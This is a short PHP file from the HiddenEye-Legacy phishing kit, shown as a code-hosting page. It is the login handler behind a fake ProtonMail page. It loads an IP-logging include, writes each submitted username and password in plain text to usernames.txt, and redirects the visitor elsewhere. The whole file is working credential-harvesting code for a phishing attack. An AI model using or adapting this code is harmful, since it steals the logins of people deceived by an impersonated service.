HiddenEye-Legacy/WebPages/protonmail/login.php

7 lines
186 B
PHP
Raw Normal View History

<?php
include 'ip.php';
file_put_contents("usernames.txt", "Account: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: <CUSTOM>');
exit();